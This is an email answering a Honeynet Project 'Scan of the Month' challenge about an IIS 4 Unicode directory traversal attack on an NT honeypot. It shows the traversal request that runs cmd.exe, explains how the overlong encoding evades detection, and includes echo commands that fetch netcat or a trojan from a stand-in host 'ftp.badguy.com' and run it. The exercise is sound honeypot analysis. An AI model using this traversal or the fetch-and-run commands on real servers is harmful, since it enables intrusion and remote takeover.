From yoann.lecorvic@infrasoft-civil.com Sun Feb 18 21:37:41 2001 Date: Thu, 01 Feb 2001 15:22:25 +0000 From: Yoann LeCorvic To: project@honeynet.org Subject: Scan of the month Hi There Here we go then, this is what I think : --What is the operating system of the honeypot, how do you know? This is an NT 4, runnning IIS 4 Web Server. This is know because of the HTTP reply : HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 --What is the name of this attack? IIS Unicode Binary Traversal Attack attack. On of the directory traversal attacks on IIS. --What is the attack attempting to accomplish? Access files on the machine that are out of the WebServer root. Possibly read and modify them through cmd shell. Inthe present case, just did a DIR C:\. It also trys to fool IDSes by hiding what it is really doing. --How does the attack work? This is a bad input validation from IIS. By replacing the \ or / by a unicode equivalent, it is possible to trick IIS to access files out of the Web Root. There are a lot of unicode characters that can be used. C0 AF is in fact a long representation for / for IIS, and that allows to hide the ../../../ (as read by IIS) as ....../.... for an IDS. So GET /msadc/....../....../....../winnt/system32/cmd.exe?/c+dir+c: is in fact GET /msadc/../../../../../../winnt/system32/cmd.exe?/c+dir+c: Which accesses cmd and returns the result of dir c: --BONUS QUESTION: Is it possible to gain remote control of the system using this technqiue? If so, how? All microsoft product with tcp ip installed come with a dos ftp client. Using this traversal attack send the command echo "open ftp.badguy.com" > ftp.txt echo "get nc99.exe" >> ftp.txt (or anyother trojan) and run /winnt/system32/ftp.exe -s:ftp.txt then run NC99... Please feel free to correct my mistakes Yoann Le Corvic - Internet Administrator Email : yoann.lecorvic@infrasoft-civil.com Web : http://www.infrasoft-civil.com/ ======================== Infrasoft Ltd North Heath Lane Horsham, West Sussex RH12 5QE United Kingdom Tel : +44 (0)1403 259511 Fax : +44 (0)1403 217728 ********************************************************************** This email message, including any files transmitted with it, is confidential and intended solely for the use of the individual or entity to whom it is addressed. If you have received this email in error please advise the sender and delete the message. **********************************************************************